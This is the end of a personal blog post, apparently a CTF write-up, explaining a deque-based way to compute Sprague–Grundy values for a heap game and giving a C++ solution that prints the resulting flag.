<p>Using a deque takes O(1) to add to front, add to back, remove from back, or remove from front, meaning it takes O(1) to transition from one region to the next. We need to transition <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msqrt><mrow><mi>m</mi><mi>a</mi><mi>x</mi><mi>i</mi><mi>m</mi><mi>u</mi><mi>m</mi><mi>h</mi><mi>e</mi><mi>a</mi><mi>p</mi><mi>s</mi><mi>i</mi><mi>z</mi><mi>e</mi></mrow></msqrt></mrow><annotation encoding="application/x-tex">\sqrt{maximum heap size}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.04em;vertical-align:-0.20500000000000007em;"></span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.835em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">m</span><span class="mord mathnormal">a</span><span class="mord mathnormal">x</span><span class="mord mathnormal">i</span><span class="mord mathnormal">m</span><span class="mord mathnormal">u</span><span class="mord mathnormal">m</span><span class="mord mathnormal">h</span><span class="mord mathnormal">e</span><span class="mord mathnormal">a</span><span class="mord mathnormal">p</span><span class="mord mathnormal">s</span><span class="mord mathnormal">i</span><span class="mord mathnormal" style="margin-right:0.04398em;">z</span><span class="mord mathnormal">e</span></span></span><span style="top:-2.795em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.20500000000000007em;"><span></span></span></span></span></span></span></span></span> regions, making the final complexity <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>O</mi><mo stretchy="false">(</mo><msqrt><mrow><mi>m</mi><mi>a</mi><mi>x</mi><mi>i</mi><mi>m</mi><mi>u</mi><mi>m</mi><mi>h</mi><mi>e</mi><mi>a</mi><mi>p</mi><mi>s</mi><mi>i</mi><mi>z</mi><mi>e</mi></mrow></msqrt><mo>+</mo><mi>n</mi><mi>u</mi><mi>m</mi><mi>b</mi><mi>e</mi><mi>r</mi><mi>o</mi><mi>f</mi><mi>h</mi><mi>e</mi><mi>a</mi><mi>p</mi><mi>s</mi><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">O(\sqrt{maximum heap size} + number of heaps)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.085em;vertical-align:-0.25em;"></span><span class="mord mathnormal" style="margin-right:0.02778em;">O</span><span class="mopen">(</span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.835em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">m</span><span class="mord mathnormal">a</span><span class="mord mathnormal">x</span><span class="mord mathnormal">i</span><span class="mord mathnormal">m</span><span class="mord mathnormal">u</span><span class="mord mathnormal">m</span><span class="mord mathnormal">h</span><span class="mord mathnormal">e</span><span class="mord mathnormal">a</span><span class="mord mathnormal">p</span><span class="mord mathnormal">s</span><span class="mord mathnormal">i</span><span class="mord mathnormal" style="margin-right:0.04398em;">z</span><span class="mord mathnormal">e</span></span></span><span style="top:-2.795em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.20500000000000007em;"><span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathnormal">n</span><span class="mord mathnormal">u</span><span class="mord mathnormal">m</span><span class="mord mathnormal">b</span><span class="mord mathnormal">e</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.10764em;">f</span><span class="mord mathnormal">h</span><span class="mord mathnormal">e</span><span class="mord mathnormal">a</span><span class="mord mathnormal">p</span><span class="mord mathnormal">s</span><span class="mclose">)</span></span></span></span>. </p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;bits/stdc++.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="type">long</span> <span class="type">long</span> ll;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    ios_base::<span class="built_in">sync_with_stdio</span>(<span class="number">0</span>);</span><br><span class="line">    cin.<span class="built_in">tie</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> t;</span><br><span class="line">    cin &gt;&gt; t;</span><br><span class="line">    </span><br><span class="line">    vector&lt;array&lt;<span class="type">int</span>,2&gt;&gt; heaps;</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; t; i++) &#123;</span><br><span class="line">        <span class="type">int</span> n;</span><br><span class="line">        cin &gt;&gt; n;</span><br><span class="line">        <span class="keyword">for</span>(<span class="type">int</span> ii = <span class="number">0</span>; ii &lt; n; ii++) &#123;</span><br><span class="line">            <span class="type">int</span> v;</span><br><span class="line">            cin &gt;&gt; v;</span><br><span class="line">            <span class="keyword">if</span>(v &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                heaps.<span class="built_in">push_back</span>(&#123;v, i&#125;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">sort</span>(heaps.<span class="built_in">begin</span>(), heaps.<span class="built_in">end</span>(), greater&lt;array&lt;<span class="type">int</span>,<span class="number">2</span>&gt;&gt;());</span><br><span class="line"></span><br><span class="line">    <span class="function">deque&lt;<span class="type">int</span>&gt; <span class="title">arr</span><span class="params">(<span class="number">1</span>, <span class="number">0</span>)</span></span>;</span><br><span class="line">    <span class="function">vector&lt;<span class="type">int</span>&gt; <span class="title">sgvs</span><span class="params">(t, <span class="number">0</span>)</span></span>;</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">1</span>; (ll)i * i &lt;= <span class="number">1e9</span> + <span class="number">5</span> &amp;&amp; !heaps.<span class="built_in">empty</span>(); i++) &#123;</span><br><span class="line">        arr.<span class="built_in">push_front</span>(<span class="built_in">sz</span>(arr));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span>(<span class="built_in">sz</span>(heaps) &amp;&amp; heaps.<span class="built_in">back</span>()[<span class="number">0</span>] &lt; (ll)(i + <span class="number">1</span>) * (i + <span class="number">1</span>)) &#123;</span><br><span class="line">            sgvs[heaps.<span class="built_in">back</span>()[<span class="number">1</span>]] ^= arr[(heaps.<span class="built_in">back</span>()[<span class="number">0</span>] - i * i) % (i + <span class="number">1</span>)];</span><br><span class="line">            heaps.<span class="built_in">pop_back</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">        arr.<span class="built_in">push_front</span>(arr.<span class="built_in">back</span>());</span><br><span class="line">        arr.<span class="built_in">pop_back</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> flag = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; t; i++) &#123;</span><br><span class="line">        flag += (ll)(sgvs[i] == <span class="number">0</span>) &lt;&lt; i;</span><br><span class="line">    &#125;</span><br><span class="line">    cout &lt;&lt; <span class="string">&quot;flag&#123;&quot;</span> &lt;&lt; flag &lt;&lt; <span class="string">&quot;&#125;\n&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


</div> 

<script>
    window.onload = detectors();
</script>
    <div class="post-footer">
    <div class="h-line-primary"></div>
    <nav class="post-nav">
        <div class="prev-item">
           
        </div>
        <div class="next-item">
            
                <div class="icon arrow-right"></div>
                <div class="post-link">
                  <a href="/2023/06/09/2023AIS3-PreExam/">Next</a>  
                </div>  
            
        </div>
    </nav>
</div>

    
      <div class="post-comment">

     

     
    
    

</div>
     
  
</article>
        </div>
      </div>
      
      <div class="footer">
    <div class="flex-container">
        <div class="footer-text">
            
            
                Jason Lin | 
            
            
                Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & <a target="_blank" rel="noopener" href="https://github.com/zoeingwingkei/frame/">Frame</a>
                
        </div>
    </div>
</div>

    </div>

    
    

  </body>
</html>
